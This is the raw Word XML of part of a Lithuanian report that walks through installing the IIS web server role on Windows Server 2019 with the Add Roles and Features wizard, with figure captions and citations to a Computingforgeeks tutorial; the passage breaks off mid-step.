      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3945E351" wp14:editId="72CD7213">
            <wp:extent cx="4572000" cy="1590675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1231962917" name="Paveikslėlis 123196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1962917"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId222">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73DBF21D" w14:textId="2CD2BA7B" w:rsidR="311E8CEB" w:rsidRPr="005A5C28" w:rsidRDefault="311E8CEB" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">13 pav. </w:t>
      </w:r>
      <w:r w:rsidR="51C62A97" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Lokalaus serverio konfigūravimas</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539B70CC" w14:textId="68316E1A" w:rsidR="00A342AC" w:rsidRPr="005A5C28" w:rsidRDefault="00A342AC" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Šaltinis: Kibet. J. (2019, spalio 19). Install and Configure IIS Web Server on Windows Server 2019. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Computingforgeeks. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId223" w:history="1">
        <w:r w:rsidR="00562646" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://computingforgeeks.com/install-and-configure-iis-web-server-on-windows-server/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00562646" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1B3F48" w14:textId="484D05F3" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:highlight w:val="blue"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ADC5A5B" w14:textId="09FA2BA5" w:rsidR="4AB5B4A0" w:rsidRPr="005A5C28" w:rsidRDefault="4AB5B4A0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Serverio tvarkyklės paleidimas</w:t>
      </w:r>
      <w:r w:rsidR="4B7FA1E9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ir</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> vaidmenų </w:t>
      </w:r>
      <w:r w:rsidR="35BF6CA3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">priskyrimas </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5799F759" w14:textId="097EA853" w:rsidR="4AB5B4A0" w:rsidRPr="005A5C28" w:rsidRDefault="4AB5B4A0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002573AA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00680AA3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>edlyje spustelėkite</w:t>
      </w:r>
      <w:r w:rsidR="002573AA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00680AA3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pirmyn</w:t>
      </w:r>
      <w:r w:rsidR="002573AA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6867D0" w14:textId="48FDF2C4" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="4AB5B4A0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>Pirmajame „</w:t>
      </w:r>
      <w:r w:rsidR="000373C9" w:rsidRPr="005A5C28">
        <w:t>Vaidmenų</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> ir funkcijų pridėjimo vedlio“ puslapyje spustelėkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidR="00374E45" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Kitas</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D59B1D6" w14:textId="42F90C55" w:rsidR="71602145" w:rsidRPr="005A5C28" w:rsidRDefault="2365FDDD" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FFAFE94" wp14:editId="165FC89E">
            <wp:extent cx="4572000" cy="3248025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1692121348" name="Paveikslėlis 169212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92121348"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId224">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B24D1B1" w14:textId="11378303" w:rsidR="18A76F5B" w:rsidRPr="005A5C28" w:rsidRDefault="18A76F5B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>14 pav.</w:t>
      </w:r>
      <w:r w:rsidR="1CA0593C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005B6A02" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Vaidmen</w:t>
      </w:r>
      <w:r w:rsidR="53E5E8B8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="1CA0593C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> priskyrimas</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="76E61FB0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ir vedlio nuostatos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059082B6" w14:textId="21326F1B" w:rsidR="18A76F5B" w:rsidRPr="005A5C28" w:rsidRDefault="18A76F5B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Šaltinis: </w:t>
      </w:r>
      <w:r w:rsidR="00731597" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Kibet. J. (2019, </w:t>
      </w:r>
      <w:r w:rsidR="004C6BB5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">spalio 19). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Install and Configure IIS Web Server on Windows Server 2019</w:t>
      </w:r>
      <w:r w:rsidR="004C6BB5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A342AC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Computingforgeeks. </w:t>
      </w:r>
      <w:r w:rsidR="004C6BB5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://computingforgeeks.com/install-and-configure-iis-web-server-on-windows-server/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0A1CFE" w14:textId="1D1BCF63" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="697AD0D8" w14:textId="19F2416D" w:rsidR="4AB5B4A0" w:rsidRPr="005A5C28" w:rsidRDefault="4AB5B4A0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00680AA3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pasirinkite Diegimo tipas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FD4A83" w14:textId="321D86A7" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="4AB5B4A0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>Puslapyje „Pasirinkite diegimo tip</w:t>
      </w:r>
      <w:r w:rsidR="788AA4D0" w:rsidRPr="005A5C28">
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t>“ pasirinkite „</w:t>
      </w:r>
      <w:r w:rsidR="55DAA1AD" w:rsidRPr="005A5C28">
        <w:t>Rolių</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> arba funkcijų diegimas“ ir spustelėkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidR="005B6A02" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Kitas</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="561D048A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FE40E2" w14:textId="232FF9F9" w:rsidR="4AB5B4A0" w:rsidRPr="005A5C28" w:rsidRDefault="4AB5B4A0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>Pridėti vaidmenis ir funkcijas</w:t>
      </w:r>
      <w:r w:rsidR="38783ED3" w:rsidRPr="005A5C28">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D918B5C" w14:textId="314DC905" w:rsidR="4A73A223" w:rsidRPr="005A5C28" w:rsidRDefault="4B960396" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E2564A0" wp14:editId="79ADB998">
            <wp:extent cx="4572000" cy="3267075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1321345289" name="Paveikslėlis 132134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21345289"/>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4D3A6C18" w14:textId="752037D5" w:rsidR="10BFA880" w:rsidRPr="005A5C28" w:rsidRDefault="10BFA880" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>15 pav. Rolės pridėjimas ir vedlio nuostatos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6990AB00" w14:textId="7C6E05F4" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="00977221" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Šaltinis: Kibet. J. (2019, spalio 19). Install and Configure IIS Web Server on Windows Server 2019. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Computingforgeeks</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. Prieiga per internetą: https://computingforgeeks.com/install-and-configure-iis-web-server-on-windows-server/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA4F40C" w14:textId="0CA316A9" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EA31129" w14:textId="0387111A" w:rsidR="4AB5B4A0" w:rsidRPr="005A5C28" w:rsidRDefault="4AB5B4A0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4 žingsnis: Pasirinkite paskirties serverį</w:t>
      </w:r>
      <w:r w:rsidR="00704861" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7A8987" w14:textId="4C1BB964" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="4AB5B4A0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">Pasirinkite serverį, kuriame įdiegsite </w:t>
      </w:r>
      <w:r w:rsidR="616ED3D8" w:rsidRPr="005A5C28">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t>NFS</w:t>
      </w:r>
      <w:r w:rsidR="3FFB57E9" w:rsidRPr="005A5C28">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">, ir spustelėkite </w:t>
      </w:r>
      <w:r w:rsidR="457D2C06" w:rsidRPr="005A5C28">
        <w:t>,,</w:t>
      </w:r>
      <w:r w:rsidR="006D3E17" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Kitas</w:t>
      </w:r>
      <w:r w:rsidR="76E82379" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8D2864" w14:textId="111EDFCA" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F1F2B35" w14:textId="408417A0" w:rsidR="68624696" w:rsidRPr="005A5C28" w:rsidRDefault="662B8401" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70D201B6" wp14:editId="1BDBC65B">
            <wp:extent cx="4572000" cy="3248025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1100032737" name="Paveikslėlis 110003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00032737"/>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1F4087A3" w14:textId="25771539" w:rsidR="24CFA28A" w:rsidRPr="005A5C28" w:rsidRDefault="24CFA28A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>16 pav. Rolės pridėjimas ir vedlio nuostatos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AFCB52" w14:textId="53DA157A" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="00977221" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Šaltinis: Kibet. J. (2019, spalio 19). Install and Configure IIS Web Server on Windows Server 2019. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Computingforgeeks</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. Prieiga per internetą: https://computingforgeeks.com/install-and-configure-iis-web-server-on-windows-server/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D118493" w14:textId="0592CA12" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="250E6556" w14:textId="0991CAC1" w:rsidR="4AB5B4A0" w:rsidRPr="005A5C28" w:rsidRDefault="4AB5B4A0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">5 žingsnis: Pasirinkite </w:t>
      </w:r>
      <w:r w:rsidR="0F62A82F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,,</w:t>
      </w:r>
      <w:r w:rsidR="2900A097" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Vaidmens</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="23922A12" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>diegimą</w:t>
      </w:r>
      <w:r w:rsidR="3F147438" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A524A1C" w14:textId="5EA420AC" w:rsidR="4AB5B4A0" w:rsidRPr="005A5C28" w:rsidRDefault="4AB5B4A0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Šioje dalyje „Pasirinkite serverio vaidmenis“</w:t>
      </w:r>
      <w:r w:rsidR="00704861" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00510527" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>asirinkite žiniatinklio serverį</w:t>
      </w:r>
      <w:r w:rsidR="719181FD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="1F2BC911" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
